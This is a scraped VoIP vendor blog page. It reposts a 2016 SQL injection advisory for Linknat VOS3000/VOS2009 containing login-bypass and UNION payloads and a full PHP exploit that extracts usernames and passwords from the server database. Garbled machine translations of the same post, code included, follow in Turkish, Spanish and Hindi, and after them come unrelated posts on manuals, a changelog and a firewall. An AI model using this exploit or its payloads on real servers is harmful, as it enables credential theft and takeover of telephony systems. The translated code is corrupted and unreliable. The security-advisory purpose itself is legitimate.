HOW VOS3000 Get Hacked by SQL Injection Script, prevent Hacking!

June 4, 2019March 10, 2026 king1 Comment

Linknat VOS2009/VOS3000 SQL injection

From: Osama Khalid <osama () codinghazard com>
Date: Thu, 19 May 2016 16:52:54 +0500

A SQL injection was found in Linknat VOS3000/VOS2009, a popular VoIP
softswitch, that could allow remote attackers to gain access to the
credentials stored in plain-text.

Application: Linknat VOS3000/VOS2009
Versions Affected: 2.1.1.5, 2.1.1.8, 2.1.2.0
Vendor URL: http://www.linknat.com/
Bug: SQLi (with DBA privileges)
Type: Remote
Resolution: Fixed, upgrade to 2.1.2.4 or 2.1.6.0 Clean Version
Reference: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

The SQLi reported is time-based blind. Since it is not an in-band SQLi, the
results can be gathered from the output of welcome.jsp during the same
session.

(1st request)

POST    http://target/eng/login.jsp
PARAM   loginType=1
        name=' union select 1,2,@@version,'hello',5,6#
        pass=' OR ''='

(2nd request during the same session)

GET     http://target/eng/welcome.jsp
RESULT  0|' union select
1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00|

[ EXPLOIT CODE ]

<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv[1];
$column_one   = isset($argv[2]) ? $argv[2] : "loginname";
$column_two   = isset($argv[3]) ? $argv[3] : "password";
$table        = isset($argv[4]) ? $argv[4] : "e_user";
$other        = isset($argv[5]) ? $argv[5] : "";

function banner() {
    echo "########################################\n";
    echo "#                                      #\n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #\n";
    echo "#                                      #\n";
    echo "#             Osama Khalid             #\n";
    echo "########### codinghazard.com ###########\n";
}

function usage() {
    echo "\n";
    echo "php vos3000.php [HOST]\n";
    echo "php vos3000.php 127.0.0.1\n";
    echo "php vos3000.php [HOST] [COL1] [COL2] [TABLE] [OTHER SQL]\n";
    echo "php vos3000.php 127.0.0.1 table_schema table_name
information_schema.tables \"where table_schema = 'mysql'\"
\n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        foreach ( $post as $key => $value)
            $post_items[] = $key . '=' . urlencode($value);
        $post_string = implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    return $data;
}

function query($host, $query) {
    $data = curl("http://$host/eng/login.jsp";, array(
            "loginType" => 1,
            "name" => "' union " . $query . "#",
            "pass" => "' OR ''='"
        ), null, true);
    preg_match_all('|Set-Cookie: (.*);|U', $data, $matches);
    $cookies = implode('; ', $matches[1]);
    $data = curl("http://$host/eng/welcome.jsp";, array(), $cookies, false);
    $parts = explode("|", trim($data));

    if (count($parts) < 7)
        return false;

    return array($parts[3], $parts[4]);
}

function ascii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid[$k] = max($wid[$k], strlen($v));
    }
    foreach($wid as $k => $v) {
        $fmt[$k] = "%-{$v}s";
        $sep[$k] = str_repeat('-', $v);
    }
    $fmt = '| ' . implode(' | ', $fmt) . ' |';
    $sep = '+-' . implode('-+-', $sep) . '-+';
    $buf = array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data as $row) {
        $buf[] = vsprintf($fmt, $row);
        $buf[] = $sep;
    }
    return implode("\n", $buf);
}

banner();
echo "\n";
echo "Target:    $host\n";
echo "Column #1: $column_one\n";
echo "Column #2: $column_two\n";
echo "Table:     $table\n";
echo "Other:     $other\n";
echo "\n";

$results = array();
$count_result = query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other");
if ($count_result) {
    $count = intval($count_result[0]);
    echo "Found $count rows...\n";

    for ($i=0; $i<$count; $i++) {
        $q = "SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " . $i . ",1";
        $result = query($host, $q);
        if ($result) {
            echo "R" . ($i+1) . "]\t" . $column_one . " = " .
hex2bin($result[0]) . ", " . $column_two . " = " . hex2bin($result[1]) .
"\n";
        } else {
            echo "Error retrieving row " . ($i+1) . "\n";
        }
        $results[] = array($column_one => hex2bin($result[0]), $column_two
=> hex2bin($result[1]));
    }

    if (count($results) > 0) {
        echo "\n\n" . ascii_table($results) . "\n";
    }
} else {
    echo "Error retrieving row count";
}

?>

From 2016 People using some sql injection soft wares to hack VOS3000, We have our own security system from that time, we updated our security system too strong now, my work focus was always for security for voip soft-switch. Most of the time i gave free advice or shared information as much possible free of cost. Still there are lots of dirty things running around, so please be careful always and know more. Otherwise you will never able to do good business ever. Now-a-days People using hidden scripts or malwares in VOS3000 Client software to hack VOS Server.

For More Help Knock me in whatsapp: +8801911119966 – i will do help all the ways.

Nasıl VOS3000 SQL Injection Script tarafından Hacked alın, Hacking önlemek!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL enjeksiyon

Gönderen: Usame Khalid <osama ()="" codinghazard="" com="">T
arih: Perşembe 19 May 2016 16:52:54 +0500</osama>

Bir SQL enjeksiyon Linknat VOS3000/VOS2009, popüler bir VoIP bulundu
softswitch, uzak saldırganların erişim elde etmek için izin verebilir
düz metinde depolanan kimlik bilgileri.

Uygulama: Linknat VOS3000/VOS2009
Etkilenen Sürümler: 2.1.1.5, 2.1.1.8, 2.1.2.0
Satıcı URL'si: http://www.linknat.com/
Hata: SQLi (DBA ayrıcalıkları ile)
Türü: Uzaktan Kumanda
Çözünürlük: Düzeltildi, 2.1.2.4 veya 2.1.6.0 Temiz Sürüm'e yükseltin
Referans: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi rapor zaman tabanlı kör olduğunu bildirdi. Bir grup SQLi olmadığından,
sonuçlar hoş geldin çıktısından toplanabilir.jsp sırasında
Oturum.

(1. istek)

http://target/eng/login.jsp sonrası
PARAM girişTürü=1
        isim=' sendika seç 1,2,@@version,'hello',5,6#
        pass=' OR ''='

(Aynı oturumda 2. istek)

GET http://target/eng/welcome.jsp
SONUÇ 0|' sendika seçimi
1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00|

<?php
#
# Linknat VOS2009[ EXPLOIT CODE ]/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset($argv)[1] ? $argv : "loginname";
$colum[2]n_two   =[2] isset($argv) ? $argv : "password";
$table [3]       = [3]isset($argv) ? $argv : "e_user";
$other    [4]    = iss[4]et($argv) ? $argv : "";

function banner[5]() {
    [5]echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.php 127.0[HOST].0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000.php 12[HOST]7[COL1].[COL2]0[TABLE].[OTHER SQL]0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        foreach ( $key olarak $post => $value)
            $post_öğeleri = $key . '=' . urlencode($value);
 []       $post_string = implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    $data geri dönmek;
}

fonksiyon sorgusu($host, $query) {
    $data = curl("http://$host/eng/login.jsp";, dizi(
            "loginType" => 1,
            "isim" => "' birliği " . $query . "#",
            "pass" => "' VEYA ''='"
        ), null, doğru);
    preg_match_all('| Set-Çerez: (.*);|U', $data, $matches);
    $cookies = implode('; ', $matches);
    $data = curl("http://$h[1]ost/eng/welcome.jsp";, array(), $cookies, false);
    $parts = patlayabilir("|", trim($data));

if (count($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_t[3]able($da[4]ta) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = max($wid, strlen($v));
    }
[$k]    foreach[$k]($k => $v olarak $wid) {
        $fmt = "%-{$v}s";
        $sep = [$k]str_repeat('-', $v);
    }[$k]
    $fmt = '| ' . implode(' | ', $fmt) . ' |';
    $sep = '+-' . implode('-+-', $sep) . '-+';
    $buf = array($sep, vsprintf($fmt, $keys), $sep);
    foreach($row olarak $data) {
        $buf = vsprintf($fmt, $row);
  []      $buf = $sep;
    }
    dönüş imp[]lode("n", $buf);
}

afiş();
yankı "n";
yankı "Hedef: $hostn";
yankı "Sütun #1: $column_onen";
yankı "Sütun #2: $column_twon";
yankı "Tablo: $tablen";
yankı "Diğer: $othern";
yankı "n";

$results = dizi();
$count_result = query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other");
if ($count_sonuç) {
    $count = intval($count_result);
    yankı "Bulunan $count satırları...n[0]";

için ($i=0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $co[0]lumn_two="" .="" "=" . hex2bin($result) .
" n";[1]="" }="" else="" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="ar[]ray($column_one" ==""> hex2bin($result),[0] $column_two
=> hex2bin($result))[1];
    }

if (count($results) > 0) {
        yankı "nn" . ascii_table($results) . "n";
    }
} else {
    yankı "Hata alma satır sayısı";
}

?></$count;>

2016'dan itibaren Vos3000 kesmek için bazı sql enjeksiyon yumuşak mallar kullanarak, Biz o zaman kendi güvenlik sistemi var, biz şimdi çok güçlü güvenlik sistemi güncelledi, benim iş odak voip soft-switch için güvenlik için her zaman oldu. Çoğu zaman ücretsiz tavsiye verdi veya mümkün olduğunca ücretsiz bilgi paylaştı. Hala kirli şeyler etrafında çalışan bir sürü, bu yüzden her zaman dikkatli olun ve daha fazla bilgi lütfen. Aksi takdirde asla iyi bir iş yapamazsınız. Şimdi-a-gün İnsanlar VOSServer kesmek için VOS3000 İstemci yazılımı gizli komut dosyaları veya kötü amaçlı yazılımlar kullanarak.

Whatsapp beni knock daha fazla yardım için: +8801911119966 – i tüm yolları yardımcı olacaktır.

Cómo VOS3000 Conseguir Hackeado por SQL Inyección Script, evitar la piratería!

June 4, 2019November 22, 2020 king

Inyección SQL Linknat VOS2009/VOS3000

Desde: Osama Khalid <osama ()="" codinghazard="" com="">
Fecha: Jue, 19 May 2016 16:52:54 +0500</osama>

Se encontró una inyección SQL en Linknat VOS3000/VOS2009, un VoIP popular
softswitch, que podría permitir a los atacantes remotos obtener acceso a la
credenciales almacenadas en texto sin formato.

Aplicación: Linknat VOS3000/VOS2009
Versiones afectadas: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL del proveedor: http://www.linknat.com/
Error: SQLi (con privilegios DBA)
Tipo: Remoto
Resolución: Corregido, actualización a 2.1.2.4 o 2.1.6.0 Versión limpia
Referencia: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

El SQLi reportado es ciego basado en el tiempo. Dado que no es un SQLi en banda, el
resultados pueden obtenerse de la salida de la bienvenida.jsp durante el mismo
Sesión.

(1a solicitud)

POST http://target/eng/login.jsp
PARAM loginType-1
        name ' unión seleccione 1,2,@@version,'hola',5,6?
        pase ' O ''' '

(2a solicitud durante la misma sesión)

OBTENGA http://target/eng/welcome.jsp
RESULTADO 0 ' selección de unión
1,2,@@version,'hola',5,6'1'5.0.51a-comunidad''hola'0.00'0.00'

[ EXPLOIT CODE ]<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_[1]one   = isset($argv) ? $argv :[2] "loginna[2]me";
$column_two   = isset($argv) ? $argv : [3]"password[3]";
$table        = isset($argv) ? $argv : "[4]e_user";
[4]$other        = isset($argv) ? $argv : ""[5];

functi[5]on banner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3[HOST]000.php 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php v[HOST]o[COL1]s[COL2]3[TABLE]00[OTHER SQL]0.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) ?
        foreach ( $post como $key > $value)
            $post_items : $key . '=' . urlencode($value);
 []       $post_string á implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data - curl_exec($curl);
    curl_close($curl);
    $data de retorno;
}

consulta de función ($host, $query)
    $data á curl("http://$host/eng/login.jsp";, array(
            "loginType" (> 1,
            "nombre" > "' unión " . $query . "#",
            "pasar" > "' O ''''"
        ), null, true);
    preg_match_all('' Set-Cookie: (.*$matches $data);
    $cookies de implode('; ', $matches);
    $data á curl("http://$host/eng/welcome.j[1]sp";, array(), $cookies, false);
    $parts de explosión ("", recorte($data));

si (cuenta($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    [3]$keys = [4]array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid de n.o s2 ($wid, strlen($v));
    }
    foreach($wi[$k]d as $k ?> [$k]$v)
        $fmt : "%--$v";
        $sep á str_repeat('-', $v);
   [$k] }
    $fmt de la página d[$k]e la casa de la casa de los ' . implode(' ? ', $fmt) . ' |';
    $sep '+-' . implode('-+-', $sep) . '-+';
    $buf á array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data as $row) ?
        $buf : vsprintf($fmt, $row)[];
        $buf á $sep;
    }
    implo[]de de retorno ("n", $buf);
}

banner();
echo "n";
echo "Target: $host-n";
echo "Column #1: $column_one-n";
echo "#2 de columnas: $column_two-n";
echo "Tabla: $table";
echo "Otros: $other";
echo "n";

$results - array();
$count_result á query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other");
si ($count_result) ?
    $count de intval($count_result);
    echo "Found $count rows...

para[0] ($i-0;<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) .
" n";="" }="" else="[1]" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" []==""> hex2bin $i($result), $column_dos
•[0]> hex2bin($result));
    }

if (c[1]ount($results) > 0)
        echo de eco ". ascii_table($results) . "n";
    }
•otra cosa?
    echo "Error al recuperar el recuento de filas";
}

?></$count;>

A partir de 2016 Personas que utilizan algunos productos blandos de inyección sql para hackear VOS3000, Tenemos nuestro propio sistema de seguridad de ese momento, actualizamos nuestro sistema de seguridad demasiado fuerte ahora, mi enfoque de trabajo siempre fue para la seguridad para voip soft-switch. La mayoría de las veces di consejos gratuitos o compartía información tanto como posible sin costo. Todavía hay un montón de cosas sucias corriendo alrededor, así que por favor tenga cuidado siempre y sepa más. De lo contrario, nunca podrás hacer un buen negocio. Ahora en día Las personas que utilizan scripts ocultos o malwares en el software cliente VOS3000 para hackear VOS Server.

Para más ayuda Knock me en whatsapp: +8801911119966 – voy a hacer ayuda a todas las maneras.

कैसे VOS3000 SQL इंजेक्शन स्क्रिप्ट द्वारा काट दिया हो, हैकिंग को रोकने के!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL इंजेक्शन

से: ओसामा खालिद <osama ()="" codinghazard="" com="">त
िथि: Thu, 19 मई २०१६ 16:52:54 + ०५००</osama>

एक एसक्यूएल इंजेक्शन Linknat VOS3000/VOS2009, एक लोकप्रिय वीओआईपी में पाया गया था
सॉफ्टस्विच, जो दूरदराज के हमलावरों को पहुंच प्राप्त करने की अनुमति दे सकता है
सादे पाठ में संग्रहीत साख।

आवेदन: लिंकनट VOS3000/VOS2009
प्रभावित संस्करण: 2.1.1.5, 2.1.1.8, 2.1.2.0
विक्रेता यूआरएल: http://www.linknat.com/
बग: एसक्यूली (डीबीए विशेषाधिकारों के साथ)
प्रकार: रिमोट
रिज़ॉल्यूशन: फिक्स्ड, 2.1.2.4 या 2.1.6.0 स्वच्छ संस्करण में अपग्रेड करें
संदर्भ: वूयून-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi रिपोर्ट समय आधारित अंधा है । चूंकि यह एक इन-बैंड SQLi नहीं है,
परिणाम उसी के दौरान स्वागत के उत्पादन से इकट्ठा किया जा सकता है.jsp
सत्र।

(पहला अनुरोध)

पद http://target/eng/login.jsp
परम लॉगइनटाइप =1
        नाम = ' संघ का चयन 1,2,@@version, 'नमस्ते', 5,6#
        पास =' या ''='

(इसी सत्र के दौरान दूसरा अनुरोध)

http://target/eng/welcome.jsp जाओ
परिणाम 0.' संघ का चयन
1,2,@@version, 'hello', 5,6 #.1.5.0.51a-community.hello.0.00.0.00.

<?php
#
# Linknat [ EXPLOIT CODE ]VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset[1]($argv) ? $argv : "loginname"[2];
$column_[2]two   = isset($argv) ? $argv : "password";
[3]$table   [3]     = isset($argv) ? $argv : "e_user";
$o[4]ther      [4]  = isset($argv) ? $argv : "";

function[5] banner()[5] {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";
    echo "php vos3000.ph[HOST]p 127.0.0.1n";
    echo "php vos3000.php     n";
    echo "php vos3000[HOST].[COL1]p[COL2]h[TABLE]p[OTHER SQL] 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        फोरच ($post $key = > $value)
            $post_आइटम = $key । '=' . यूरेनकोड ($value);
        []$post_स्ट्रिंग = फटना ('&', $post_आइटम);
        curl_setopt ($curl, CURLOPT_POST, 1);
        curl_setopt ($curl, CURLOPT_POSTFIELDS, $post_स्ट्रिंग);
    }
    $data = curl_exec ($curl);
    curl_close ($curl);
    $data लौटें;
}

फंक्शन क्वेरी ($host, $query) {
    $data = कर्ल ("http://$host/eng/login.jsp";, सरणी (
            "लॉगिनटाइप" = > 1,
            "नाम" = > "संघ" । $query । "#",
            "पास" = > "' या '='"
        ), अशक्त, सच है);
    preg_match_all ('। सेट-कुकी: (.*);..यू', $data, $matches);
    $cookies = फटना ('; ', $matches);
    $data = कर्ल ("http://$host/eng/welcome.j[1]sp";, सरणी (), $cookies, झूठी);
    $parts = विस्फोट (".., ट्रिम ($data));

यदि (गिनती ($parts) < 7)
        return false;

    return array($parts, $parts);
}

function ascii_table($data) {
    $[3]keys = a[4]rray_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = अधिकतम ($wid, स्ट्रेन ($v));
    }
    फोरच ($k [$k]= > $v) के [$k]रूप में $wid {
        $fmt = "%-{$v}s";
        $sep = str_repea[$k]t ('-', $v);
    }
    $fmt[$k] = '। ' . फटना (' । ', $fmt) । ' |';
    $sep = '+-' । फटना ('-+-', $sep) । '-+';
    $buf = सरणी ($sep, वेस्प्रिंट ($fmt, $keys), $sep);
    फोरच ($row के रूप में $data) {
        $buf = vsprintf ($fmt, $row);
        $[]buf = $sep;
    }
    वापसी फटना ("n[]", $buf);
}

बैनर ();
गूंज "n";
गूंज "लक्ष्य: $host  n";
गूंज "कॉलम #1: $column_onen";
गूंज "कॉलम #2: $column_दो n";
गूंज "तालिका: $table n";
गूंज "अन्य: $other n";
गूंज "n";

$results = सरणी ();
$count_result = क्वेरी ($host, "1,2,काउंट (*), 4,5,6 से $table
$other");
यदि ($count_result) {
    $count = intval ($count_result);
    गूंज "पंक्तियों $count पाया...n";

के लिए ($i = [0]0; $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .=[0]"" "=" . hex2bin($result) .
" n";="" }="" else=[1]"" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_on[]e" ==""> hex2bin ($result), $column_two
[0]=> हेक्स2बिन ($result));
    }

य[1]दि (गिनती ($results) > 0) {
        गूंज "nn" । ascii_table ($results) । "n";
    }
}अन्य {
    गूंज "त्रुटि पुनः प्राप्त पंक्ति गिनती";
}

?></$count;>

2016 से लोग VOS3000 हैक करने के लिए कुछ वर्ग इंजेक्शन सॉफ्ट माल का उपयोग करते हैं, हमारे पास उस समय से हमारी अपनी सुरक्षा प्रणाली है, हमने अपनी सुरक्षा प्रणाली को अपडेट किया है, अब हमने अपनी सुरक्षा प्रणाली को भी मजबूत किया है, मेरा काम ध्यान वीओआईपी सॉफ्ट-स्विच के लिए सुरक्षा के लिए हमेशा था। अधिकांश समय मैंने मुफ्त सलाह दी या जितना संभव हो उतना मुफ्त जानकारी साझा की। फिर भी बहुत सारी गंदी चीजें चल रही हैं, इसलिए कृपया हमेशा सावधान रहें और अधिक जानें। वरना आप कभी भी अच्छा बिजनेस नहीं कर पाएंगे। अब-एक दिन VOS सर्वर हैक करने के लिए VOS3000 क्लाइंट सॉफ्टवेयर में छिपी स्क्रिप्ट या मैलवेयर का उपयोग कर रहे लोग।

अधिक मदद के लिए मुझे whatsapp में दस्तक: + ८८०१९११११९९६६-मैं सभी तरीकों से मदद करेंगे ।

multahost-vos3000-server-banner, VOS3000 2.1.8.00, VOS3000 All PDF Manuals, VOS3000 client, Vendor Billing

VOS3000 2.1.7.01 Manual/Guide/Details in English

June 2, 2019January 16, 2026 king

VOS3000 2.1.7.01 Manual/Guide/Details in English

Dear Readers,

This post is very Simple, Whoever you are looking for VOS3000 2.1.7.01 Version Manual, You can download it from here, Its official Manual for VOS3000 2.1.7.01. This is complete English manual for vos3000 2170.1 version.

Here is the download link: http://vos3000.com/downloads/VOS3000_Manual_Version2170_(VOS3000.Com).pdf

If you have any issue or if you need any kind help then please let us know. Stay tuned for more VOS3000 Updates.

VOS3000_Web_Interface_Developing_Manual/WEB API VOS3000

VOS3000 2.1.4.0 Manual/Guide/Details

June 2, 2019June 4, 2019 king

Dear Readers,

This post is very Simple, Whoever you are looking for VOS3000 2.1.4.0 Version Manual, You can download it from here, Its official Manual for VOS3000 2.1.4.0. This is complete English manual for vos3000 2140 version.

Here is the download link: http://vos3000.com/downloads/VOS3000_Manual_Version2140_(VOS3000.Com).pdf

If you have any issue or if you need any kind help then please let us know. Stay tuned for more VOS3000 Updates.

VOS3000 Web Management/Android/IOS Mobile Apps Developing API

June 2, 2019June 2, 2019 king1 Comment

Dear Readers,

Many people now a days looking for how to develop VOS3000 web modules, Some of them made it insecurely. This blog is written for it, VOS3000 already have API Details for Web management software developer or Who want web controller or Mobile Apps, If you really need it then we will suggest to develop it your own with a developer to be safe side. Its pretty simple work, any programmer can do it without much coding knowledge, I am sharing the complete Guide to Make Mobile Apps for VOS3000 or Web Management. Its from Official Developers, so its better to use their API. One more thing, Please make sure your security is very strong because using web management will open more doors for bad people to hack it.

Here is the Link for Download it: http://vos3000.com/downloads/VOS3000_Web_Interface_Developing_Manual(VOS3000.Com).pdf

Stay Connected for All Kind VOS3000 Updates.

VOS3000 2.1.6.0 Change logs/ Updates history by Developer Team

June 1, 2019June 2, 2019 king

Here is the last updated list by developer team for vos3000 2.1.6.0

V2.1.6.0

Phone forwarding number provides tabular editing
The phone increases the call-free setting of the call platform phone, and increases the system parameters to control. 6
The phone increases the incoming caller rewriting rules.
Add a phone card to open a card to support multiple package settings
Increase the maximum minute rate setting for the phone
Phone Adds General Call Transfer/Interrogated Call Transfer Outgoing Display Settings
Increase call picking function
Add a multi-number function to the phone
Increase call retention
Increase the processing mode of the account balance when the package subscription is insufficient (including interface)
Increase the account validity period after the recharge card is recharged
Add a package non-full cycle subscription feature
Rate management increases by billing prefix filter
Increase the minimum profit margin of the landing gateway to support the negative setting (VOS3000.Com exclusive)
Package increases the effective consumption limit
Increase package priority
Rate group increase is filtered by name
Rate replacement redesign
Callback according to the flow rate
Add another income report
Increase the landing gateway time period priority (unique for VOS3000.Com)
Increase the concurrent and falling alarms of the docking/landing gateway (exclusive to VOS3000.Com)
Increase the time-based alarm configuration capability of the docking/landing gateway (exclusive to the VOS3000.Com)
Increase the landing gateway call timeout alarm (unique for VOS3000.Com)
Increase the docking gateway CPS alarm (unique for VOS3000.Com)
Add phone/land/dock gateway independent registration and call tracking
Increase user login client NIC Mac limitability
Filter table keywords increase comma separation while filtering multiple pieces of data
Improve the card card opening function, add extra features of the phone card
Improve the log query process
Increase Agency Revenue Statement
Add dual-system hot backup client direct management (VOS3000.Com is equipped with dual-system hot standby module)
Increase the number of lines reserved by the landing gateway (unique for VOS3000.Com)
Increase the gateway group line limit using the gateway setting function (unique for VOS3000.Com)
Landing/docking gateways can restrict names (unique for VOS3000.Com)
Docking/landing gateway adds CPS control, online landing/docking increases CPS display (VOS3000.Com exclusive)
Increase the parameter setting password alternative character set
IVR process tracking
Increase the accuracy of bill calculation
Increase the standard WEB log IP address record function
Increase the VOS service process monitoring component
Increase illegal call alert (unique for VOS3000.Com)
Add a docking gateway call return error code customization, you can customize the error code conversion rules
Increase all database alarms (unique for VOS3000.Com)

VOS3000 2.1.6.0 Version clean VirusFree, Backdoor Free Client Software :

http://vos3000.com/downloads/VOS3000%20V2.1.6.0(VOS3000.Com).exe

Download now!

VOS3000 Extended Firewall for Secured Server

May 27, 2019March 10, 2026 king

VOS3000 Extended Firewall for Secured Server

Hello all,

Basically we was the first who developed “Access Code” based firewall. Its actually most simple and easy firewall ever. The reason of this firewall is:

1. Many unwanted people scan ips and try for login in vos client, so for access code now its double layers. Without allowing access code nobody can login vos client. So they need to know both details.

2. Our Firewall block all chinese/russian/hacker ip database. So its completely updated automatically from our ip database.

3. We changed SSH ports as well and without allowing “Access Code” you can’t even login ssh.

4. VOS3000 Extended Firewall rules updated every month, version wise rules are not same, because each version have each type loophole, so need to study and work accordingly. Otherwise firewall will be useless.

5. we do not use any php based web firewall which looks good but actually not work well

6. we use simple rules in iptables and access code based system

